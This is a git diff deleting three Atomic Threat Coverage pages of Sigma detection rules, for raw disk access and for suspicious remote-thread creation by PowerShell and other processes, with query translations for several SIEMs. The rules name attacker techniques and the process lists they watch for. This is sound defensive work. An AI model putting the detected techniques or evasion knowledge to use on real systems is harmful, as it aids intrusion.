-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate Administrator using tool for raw access or ongoing forensic investigation</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment](https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment)</li></ul>  |
-| **Author**               | Teymur Kheirkhabarov, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Raw Disk Access Using Illegitimate Tools
-id: db809f10-56ce-4420-8c86-d6a7d793c79c
-description: Raw disk access using illegitimate tools, possible defence evasion
-author: Teymur Kheirkhabarov, oscd.community
-date: 2019/10/22
-references:
-    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
-tags:
-    - attack.defense_evasion
-    - attack.t1006
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    selection:
-        EventID: 9
-    filter_1:
-        Device|contains: floppy
-    filter_2:
-      - Image|endswith:             # easy to bypass. requires extra rule to support this one
-            - '\wmiprvse.exe'
-            - '\sdiagnhost.exe'
-            - '\searchindexer.exe'
-            - '\csrss.exe'
-            - '\defrag.exe'
-            - '\smss.exe'
-            - '\vssvc.exe'
-            - '\compattelrunner.exe'
-            - '\wininit.exe'
-            - '\autochk.exe'
-            - '\taskhost.exe'
-            - '\dfsrs.exe'
-            - '\vds.exe'
-            - '\lsass.exe'
-    condition: selection and not filter_1 and not filter_2
-fields:
-    - ComputerName
-    - Image
-    - ProcessID
-    - Device
-falsepositives:
-    - Legitimate Administrator using tool for raw access or ongoing forensic investigation
-level: medium
-status: experimental
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "9" -and  -not ($_.message -match "Device.*.*floppy.*")) -and  -not (($_.message -match "Image.*.*\\wmiprvse.exe" -or $_.message -match "Image.*.*\\sdiagnhost.exe" -or $_.message -match "Image.*.*\\searchindexer.exe" -or $_.message -match "Image.*.*\\csrss.exe" -or $_.message -match "Image.*.*\\defrag.exe" -or $_.message -match "Image.*.*\\smss.exe" -or $_.message -match "Image.*.*\\vssvc.exe" -or $_.message -match "Image.*.*\\compattelrunner.exe" -or $_.message -match "Image.*.*\\wininit.exe" -or $_.message -match "Image.*.*\\autochk.exe" -or $_.message -match "Image.*.*\\taskhost.exe" -or $_.message -match "Image.*.*\\dfsrs.exe" -or $_.message -match "Image.*.*\\vds.exe" -or $_.message -match "Image.*.*\\lsass.exe"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND (winlog.event_id:"9" AND (NOT (Device.keyword:*floppy*))) AND (NOT (winlog.event_data.Image.keyword:(*\\wmiprvse.exe OR *\\sdiagnhost.exe OR *\\searchindexer.exe OR *\\csrss.exe OR *\\defrag.exe OR *\\smss.exe OR *\\vssvc.exe OR *\\compattelrunner.exe OR *\\wininit.exe OR *\\autochk.exe OR *\\taskhost.exe OR *\\dfsrs.exe OR *\\vds.exe OR *\\lsass.exe))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/db809f10-56ce-4420-8c86-d6a7d793c79c <<EOF
-{
-  "metadata": {
-    "title": "Raw Disk Access Using Illegitimate Tools",
-    "description": "Raw disk access using illegitimate tools, possible defence evasion",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1006"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND (winlog.event_id:\"9\" AND (NOT (Device.keyword:*floppy*))) AND (NOT (winlog.event_data.Image.keyword:(*\\\\wmiprvse.exe OR *\\\\sdiagnhost.exe OR *\\\\searchindexer.exe OR *\\\\csrss.exe OR *\\\\defrag.exe OR *\\\\smss.exe OR *\\\\vssvc.exe OR *\\\\compattelrunner.exe OR *\\\\wininit.exe OR *\\\\autochk.exe OR *\\\\taskhost.exe OR *\\\\dfsrs.exe OR *\\\\vds.exe OR *\\\\lsass.exe))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND (winlog.event_id:\"9\" AND (NOT (Device.keyword:*floppy*))) AND (NOT (winlog.event_data.Image.keyword:(*\\\\wmiprvse.exe OR *\\\\sdiagnhost.exe OR *\\\\searchindexer.exe OR *\\\\csrss.exe OR *\\\\defrag.exe OR *\\\\smss.exe OR *\\\\vssvc.exe OR *\\\\compattelrunner.exe OR *\\\\wininit.exe OR *\\\\autochk.exe OR *\\\\taskhost.exe OR *\\\\dfsrs.exe OR *\\\\vds.exe OR *\\\\lsass.exe))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Raw Disk Access Using Illegitimate Tools'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n       Image = {{_source.Image}}\n   ProcessID = {{_source.ProcessID}}\n      Device = {{_source.Device}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:"9" AND (NOT (Device.keyword:*floppy*))) AND (NOT (Image.keyword:(*\\wmiprvse.exe *\\sdiagnhost.exe *\\searchindexer.exe *\\csrss.exe *\\defrag.exe *\\smss.exe *\\vssvc.exe *\\compattelrunner.exe *\\wininit.exe *\\autochk.exe *\\taskhost.exe *\\dfsrs.exe *\\vds.exe *\\lsass.exe))))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" (EventCode="9" NOT (Device="*floppy*")) NOT ((Image="*\\wmiprvse.exe" OR Image="*\\sdiagnhost.exe" OR Image="*\\searchindexer.exe" OR Image="*\\csrss.exe" OR Image="*\\defrag.exe" OR Image="*\\smss.exe" OR Image="*\\vssvc.exe" OR Image="*\\compattelrunner.exe" OR Image="*\\wininit.exe" OR Image="*\\autochk.exe" OR Image="*\\taskhost.exe" OR Image="*\\dfsrs.exe" OR Image="*\\vds.exe" OR Image="*\\lsass.exe"))) | table ComputerName,Image,ProcessID,Device
-```
-
-
-### logpoint
-    
-```
-((event_id="9"  -(Device="*floppy*"))  -(Image IN ["*\\wmiprvse.exe", "*\\sdiagnhost.exe", "*\\searchindexer.exe", "*\\csrss.exe", "*\\defrag.exe", "*\\smss.exe", "*\\vssvc.exe", "*\\compattelrunner.exe", "*\\wininit.exe", "*\\autochk.exe", "*\\taskhost.exe", "*\\dfsrs.exe", "*\\vds.exe", "*\\lsass.exe"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*9)(?=.*(?!.*(?:.*(?=.*.*floppy.*))))))(?=.*(?!.*(?:.*(?:.*(?=.*(?:.*.*\wmiprvse\.exe|.*.*\sdiagnhost\.exe|.*.*\searchindexer\.exe|.*.*\csrss\.exe|.*.*\defrag\.exe|.*.*\smss\.exe|.*.*\vssvc\.exe|.*.*\compattelrunner\.exe|.*.*\wininit\.exe|.*.*\autochk\.exe|.*.*\taskhost\.exe|.*.*\dfsrs\.exe|.*.*\vds\.exe|.*.*\lsass\.exe)))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_susp_powershell_rundll32.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_susp_powershell_rundll32.md
deleted file mode 100644
index 411762f..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_susp_powershell_rundll32.md
+++ /dev/null
@@ -1,182 +0,0 @@
-| Title                    | PowerShell Rundll32 Remote Thread Creation       |
-|:-------------------------|:------------------|
-| **Description**          | Detects PowerShell remote thread creation in Rundll32.exe |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1085: Rundll32](https://attack.mitre.org/techniques/T1085)</li><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unkown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html](https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1218.011</li><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: PowerShell Rundll32 Remote Thread Creation
-id: 99b97608-3e21-4bfe-8217-2a127c396a0e
-status: experimental
-description: Detects PowerShell remote thread creation in Rundll32.exe
-author: Florian Roth
-references:
-    - https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html
-date: 2018/06/25
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    selection:
-        EventID: 8
-        SourceImage: '*\powershell.exe'
-        TargetImage: '*\rundll32.exe'
-    condition: selection
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1085
-    - attack.t1086
-    - attack.t1218.011
-    - attack.t1059.001
-falsepositives:
-    - Unkown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "8" -and $_.message -match "SourceImage.*.*\\powershell.exe" -and $_.message -match "TargetImage.*.*\\rundll32.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"8" AND winlog.event_data.SourceImage.keyword:*\\powershell.exe AND winlog.event_data.TargetImage.keyword:*\\rundll32.exe)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/99b97608-3e21-4bfe-8217-2a127c396a0e <<EOF
-{
-  "metadata": {
-    "title": "PowerShell Rundll32 Remote Thread Creation",
-    "description": "Detects PowerShell remote thread creation in Rundll32.exe",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1085",
-      "attack.t1086",
-      "attack.t1218.011",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"8\" AND winlog.event_data.SourceImage.keyword:*\\\\powershell.exe AND winlog.event_data.TargetImage.keyword:*\\\\rundll32.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"8\" AND winlog.event_data.SourceImage.keyword:*\\\\powershell.exe AND winlog.event_data.TargetImage.keyword:*\\\\rundll32.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'PowerShell Rundll32 Remote Thread Creation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"8" AND SourceImage.keyword:*\\powershell.exe AND TargetImage.keyword:*\\rundll32.exe)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="8" SourceImage="*\\powershell.exe" TargetImage="*\\rundll32.exe")
-```
-
-
-### logpoint
-    
-```
-(event_id="8" SourceImage="*\\powershell.exe" TargetImage="*\\rundll32.exe")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*8)(?=.*.*\powershell\.exe)(?=.*.*\rundll32\.exe))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_suspicious_remote_thread.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_suspicious_remote_thread.md
deleted file mode 100644
index 1b75482..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_suspicious_remote_thread.md
+++ /dev/null
@@ -1,234 +0,0 @@
-| Title                    | Suspicious Remote Thread Created       |
-|:-------------------------|:------------------|
-| **Description**          | Offensive tradecraft is switching away from using APIs like "CreateRemoteThread", however, this is still largely observed in the wild. This rule aims to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes. It is a generalistic rule, but it should have a low FP ratio due to the selected range of processes. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1055: Process Injection](https://attack.mitre.org/techniques/T1055)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1055: Process Injection](../Triggers/T1055.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[Personal research, statistical analysis](Personal research, statistical analysis)</li><li>[https://lolbas-project.github.io](https://lolbas-project.github.io)</li></ul>  |
-| **Author**               | Perez Diego (@darkquassar), oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Remote Thread Created
-id: 66d31e5f-52d6-40a4-9615-002d3789a119
-description: Offensive tradecraft is switching away from using APIs like "CreateRemoteThread", however, this is still largely observed in the wild. This rule aims
-    to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes. It is
-    a generalistic rule, but it should have a low FP ratio due to the selected range of processes.
-notes:
-    - MonitoringHost.exe is a process that loads .NET CLR by default and thus a favorite for process injection for .NET in-memory offensive tools.
-status: experimental
-date: 2019/10/27
-modified: 2019/11/13
-author: Perez Diego (@darkquassar), oscd.community
-references:
-    - Personal research, statistical analysis
-    - https://lolbas-project.github.io
-logsource:
-    product: windows
-    service: sysmon
-tags:
-    - attack.privilege_escalation
-    - attack.t1055
-detection:
-    selection: 
-        EventID: 8
-        SourceImage|endswith:
-            - '\bash.exe'
-            - '\cvtres.exe'
-            - '\defrag.exe'
-            - '\dnx.exe'
-            - '\esentutl.exe'
-            - '\excel.exe'
-            - '\expand.exe'
-            - '\explorer.exe'
-            - '\find.exe'
-            - '\findstr.exe'
-            - '\forfiles.exe'
-            - '\git.exe'
-            - '\gpupdate.exe'
-            - '\hh.exe'
-            - '\iexplore.exe'
-            - '\installutil.exe'
-            - '\lync.exe'
-            - '\makecab.exe'
-            - '\mDNSResponder.exe'
-            - '\monitoringhost.exe'
-            - '\msbuild.exe'
-            - '\mshta.exe'
-            - '\msiexec.exe'
-            - '\mspaint.exe'
-            - '\outlook.exe'
-            - '\ping.exe'
-            - '\powerpnt.exe'
-            - '\powershell.exe'
-            - '\provtool.exe'
-            - '\python.exe'
-            - '\regsvr32.exe'
-            - '\robocopy.exe'
-            - '\runonce.exe'
-            - '\sapcimc.exe'
-            - '\schtasks.exe'
-            - '\smartscreen.exe'
-            - '\spoolsv.exe'
-            # - '\taskhost.exe'  # disabled due to false positives
-            - '\tstheme.exe'
-            - '\userinit.exe'
-            - '\vssadmin.exe'
-            - '\vssvc.exe'
-            - '\w3wp.exe*'       
-            - '\winlogon.exe'
-            - '\winscp.exe'
-            - '\wmic.exe'
-            - '\word.exe'
-            - '\wscript.exe'
-    filter:
-        SourceImage|contains: 'Visual Studio'
-    condition: selection AND NOT filter
-fields:
-    - ComputerName
-    - User
-    - SourceImage
-    - TargetImage
-level: high
-falsepositives:
-    - Unknown
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "8" -and ($_.message -match "SourceImage.*.*\\bash.exe" -or $_.message -match "SourceImage.*.*\\cvtres.exe" -or $_.message -match "SourceImage.*.*\\defrag.exe" -or $_.message -match "SourceImage.*.*\\dnx.exe" -or $_.message -match "SourceImage.*.*\\esentutl.exe" -or $_.message -match "SourceImage.*.*\\excel.exe" -or $_.message -match "SourceImage.*.*\\expand.exe" -or $_.message -match "SourceImage.*.*\\explorer.exe" -or $_.message -match "SourceImage.*.*\\find.exe" -or $_.message -match "SourceImage.*.*\\findstr.exe" -or $_.message -match "SourceImage.*.*\\forfiles.exe" -or $_.message -match "SourceImage.*.*\\git.exe" -or $_.message -match "SourceImage.*.*\\gpupdate.exe" -or $_.message -match "SourceImage.*.*\\hh.exe" -or $_.message -match "SourceImage.*.*\\iexplore.exe" -or $_.message -match "SourceImage.*.*\\installutil.exe" -or $_.message -match "SourceImage.*.*\\lync.exe" -or $_.message -match "SourceImage.*.*\\makecab.exe" -or $_.message -match "SourceImage.*.*\\mDNSResponder.exe" -or $_.message -match "SourceImage.*.*\\monitoringhost.exe" -or $_.message -match "SourceImage.*.*\\msbuild.exe" -or $_.message -match "SourceImage.*.*\\mshta.exe" -or $_.message -match "SourceImage.*.*\\msiexec.exe" -or $_.message -match "SourceImage.*.*\\mspaint.exe" -or $_.message -match "SourceImage.*.*\\outlook.exe" -or $_.message -match "SourceImage.*.*\\ping.exe" -or $_.message -match "SourceImage.*.*\\powerpnt.exe" -or $_.message -match "SourceImage.*.*\\powershell.exe" -or $_.message -match "SourceImage.*.*\\provtool.exe" -or $_.message -match "SourceImage.*.*\\python.exe" -or $_.message -match "SourceImage.*.*\\regsvr32.exe" -or $_.message -match "SourceImage.*.*\\robocopy.exe" -or $_.message -match "SourceImage.*.*\\runonce.exe" -or $_.message -match "SourceImage.*.*\\sapcimc.exe" -or $_.message -match "SourceImage.*.*\\schtasks.exe" -or $_.message -match "SourceImage.*.*\\smartscreen.exe" -or $_.message -match "SourceImage.*.*\\spoolsv.exe" -or $_.message -match "SourceImage.*.*\\tstheme.exe" -or $_.message -match "SourceImage.*.*\\userinit.exe" -or $_.message -match "SourceImage.*.*\\vssadmin.exe" -or $_.message -match "SourceImage.*.*\\vssvc.exe" -or $_.message -match "SourceImage.*.*\\w3wp.exe.*" -or $_.message -match "SourceImage.*.*\\winlogon.exe" -or $_.message -match "SourceImage.*.*\\winscp.exe" -or $_.message -match "SourceImage.*.*\\wmic.exe" -or $_.message -match "SourceImage.*.*\\word.exe" -or $_.message -match "SourceImage.*.*\\wscript.exe")) -and  -not ($_.message -match "SourceImage.*.*Visual Studio.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND (winlog.event_id:"8" AND winlog.event_data.SourceImage.keyword:(*\\bash.exe OR *\\cvtres.exe OR *\\defrag.exe OR *\\dnx.exe OR *\\esentutl.exe OR *\\excel.exe OR *\\expand.exe OR *\\explorer.exe OR *\\find.exe OR *\\findstr.exe OR *\\forfiles.exe OR *\\git.exe OR *\\gpupdate.exe OR *\\hh.exe OR *\\iexplore.exe OR *\\installutil.exe OR *\\lync.exe OR *\\makecab.exe OR *\\mDNSResponder.exe OR *\\monitoringhost.exe OR *\\msbuild.exe OR *\\mshta.exe OR *\\msiexec.exe OR *\\mspaint.exe OR *\\outlook.exe OR *\\ping.exe OR *\\powerpnt.exe OR *\\powershell.exe OR *\\provtool.exe OR *\\python.exe OR *\\regsvr32.exe OR *\\robocopy.exe OR *\\runonce.exe OR *\\sapcimc.exe OR *\\schtasks.exe OR *\\smartscreen.exe OR *\\spoolsv.exe OR *\\tstheme.exe OR *\\userinit.exe OR *\\vssadmin.exe OR *\\vssvc.exe OR *\\w3wp.exe* OR *\\winlogon.exe OR *\\winscp.exe OR *\\wmic.exe OR *\\word.exe OR *\\wscript.exe)) AND (NOT (winlog.event_data.SourceImage.keyword:*Visual\ Studio*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/66d31e5f-52d6-40a4-9615-002d3789a119 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Remote Thread Created",
-    "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild. This rule aims to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes. It is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.",
-    "tags": [
-      "attack.privilege_escalation",
-      "attack.t1055"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND (winlog.event_id:\"8\" AND winlog.event_data.SourceImage.keyword:(*\\\\bash.exe OR *\\\\cvtres.exe OR *\\\\defrag.exe OR *\\\\dnx.exe OR *\\\\esentutl.exe OR *\\\\excel.exe OR *\\\\expand.exe OR *\\\\explorer.exe OR *\\\\find.exe OR *\\\\findstr.exe OR *\\\\forfiles.exe OR *\\\\git.exe OR *\\\\gpupdate.exe OR *\\\\hh.exe OR *\\\\iexplore.exe OR *\\\\installutil.exe OR *\\\\lync.exe OR *\\\\makecab.exe OR *\\\\mDNSResponder.exe OR *\\\\monitoringhost.exe OR *\\\\msbuild.exe OR *\\\\mshta.exe OR *\\\\msiexec.exe OR *\\\\mspaint.exe OR *\\\\outlook.exe OR *\\\\ping.exe OR *\\\\powerpnt.exe OR *\\\\powershell.exe OR *\\\\provtool.exe OR *\\\\python.exe OR *\\\\regsvr32.exe OR *\\\\robocopy.exe OR *\\\\runonce.exe OR *\\\\sapcimc.exe OR *\\\\schtasks.exe OR *\\\\smartscreen.exe OR *\\\\spoolsv.exe OR *\\\\tstheme.exe OR *\\\\userinit.exe OR *\\\\vssadmin.exe OR *\\\\vssvc.exe OR *\\\\w3wp.exe* OR *\\\\winlogon.exe OR *\\\\winscp.exe OR *\\\\wmic.exe OR *\\\\word.exe OR *\\\\wscript.exe)) AND (NOT (winlog.event_data.SourceImage.keyword:*Visual\\ Studio*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND (winlog.event_id:\"8\" AND winlog.event_data.SourceImage.keyword:(*\\\\bash.exe OR *\\\\cvtres.exe OR *\\\\defrag.exe OR *\\\\dnx.exe OR *\\\\esentutl.exe OR *\\\\excel.exe OR *\\\\expand.exe OR *\\\\explorer.exe OR *\\\\find.exe OR *\\\\findstr.exe OR *\\\\forfiles.exe OR *\\\\git.exe OR *\\\\gpupdate.exe OR *\\\\hh.exe OR *\\\\iexplore.exe OR *\\\\installutil.exe OR *\\\\lync.exe OR *\\\\makecab.exe OR *\\\\mDNSResponder.exe OR *\\\\monitoringhost.exe OR *\\\\msbuild.exe OR *\\\\mshta.exe OR *\\\\msiexec.exe OR *\\\\mspaint.exe OR *\\\\outlook.exe OR *\\\\ping.exe OR *\\\\powerpnt.exe OR *\\\\powershell.exe OR *\\\\provtool.exe OR *\\\\python.exe OR *\\\\regsvr32.exe OR *\\\\robocopy.exe OR *\\\\runonce.exe OR *\\\\sapcimc.exe OR *\\\\schtasks.exe OR *\\\\smartscreen.exe OR *\\\\spoolsv.exe OR *\\\\tstheme.exe OR *\\\\userinit.exe OR *\\\\vssadmin.exe OR *\\\\vssvc.exe OR *\\\\w3wp.exe* OR *\\\\winlogon.exe OR *\\\\winscp.exe OR *\\\\wmic.exe OR *\\\\word.exe OR *\\\\wscript.exe)) AND (NOT (winlog.event_data.SourceImage.keyword:*Visual\\ Studio*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Remote Thread Created'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n        User = {{_source.User}}\n SourceImage = {{_source.SourceImage}}\n TargetImage = {{_source.TargetImage}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:"8" AND SourceImage.keyword:(*\\bash.exe *\\cvtres.exe *\\defrag.exe *\\dnx.exe *\\esentutl.exe *\\excel.exe *\\expand.exe *\\explorer.exe *\\find.exe *\\findstr.exe *\\forfiles.exe *\\git.exe *\\gpupdate.exe *\\hh.exe *\\iexplore.exe *\\installutil.exe *\\lync.exe *\\makecab.exe *\\mDNSResponder.exe *\\monitoringhost.exe *\\msbuild.exe *\\mshta.exe *\\msiexec.exe *\\mspaint.exe *\\outlook.exe *\\ping.exe *\\powerpnt.exe *\\powershell.exe *\\provtool.exe *\\python.exe *\\regsvr32.exe *\\robocopy.exe *\\runonce.exe *\\sapcimc.exe *\\schtasks.exe *\\smartscreen.exe *\\spoolsv.exe *\\tstheme.exe *\\userinit.exe *\\vssadmin.exe *\\vssvc.exe *\\w3wp.exe* *\\winlogon.exe *\\winscp.exe *\\wmic.exe *\\word.exe *\\wscript.exe)) AND (NOT (SourceImage.keyword:*Visual Studio*)))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" (EventCode="8" (SourceImage="*\\bash.exe" OR SourceImage="*\\cvtres.exe" OR SourceImage="*\\defrag.exe" OR SourceImage="*\\dnx.exe" OR SourceImage="*\\esentutl.exe" OR SourceImage="*\\excel.exe" OR SourceImage="*\\expand.exe" OR SourceImage="*\\explorer.exe" OR SourceImage="*\\find.exe" OR SourceImage="*\\findstr.exe" OR SourceImage="*\\forfiles.exe" OR SourceImage="*\\git.exe" OR SourceImage="*\\gpupdate.exe" OR SourceImage="*\\hh.exe" OR SourceImage="*\\iexplore.exe" OR SourceImage="*\\installutil.exe" OR SourceImage="*\\lync.exe" OR SourceImage="*\\makecab.exe" OR SourceImage="*\\mDNSResponder.exe" OR SourceImage="*\\monitoringhost.exe" OR SourceImage="*\\msbuild.exe" OR SourceImage="*\\mshta.exe" OR SourceImage="*\\msiexec.exe" OR SourceImage="*\\mspaint.exe" OR SourceImage="*\\outlook.exe" OR SourceImage="*\\ping.exe" OR SourceImage="*\\powerpnt.exe" OR SourceImage="*\\powershell.exe" OR SourceImage="*\\provtool.exe" OR SourceImage="*\\python.exe" OR SourceImage="*\\regsvr32.exe" OR SourceImage="*\\robocopy.exe" OR SourceImage="*\\runonce.exe" OR SourceImage="*\\sapcimc.exe" OR SourceImage="*\\schtasks.exe" OR SourceImage="*\\smartscreen.exe" OR SourceImage="*\\spoolsv.exe" OR SourceImage="*\\tstheme.exe" OR SourceImage="*\\userinit.exe" OR SourceImage="*\\vssadmin.exe" OR SourceImage="*\\vssvc.exe" OR SourceImage="*\\w3wp.exe*" OR SourceImage="*\\winlogon.exe" OR SourceImage="*\\winscp.exe" OR SourceImage="*\\wmic.exe" OR SourceImage="*\\word.exe" OR SourceImage="*\\wscript.exe")) NOT (SourceImage="*Visual Studio*")) | table ComputerName,User,SourceImage,TargetImage
-```
-
-
-### logpoint
-    
-```
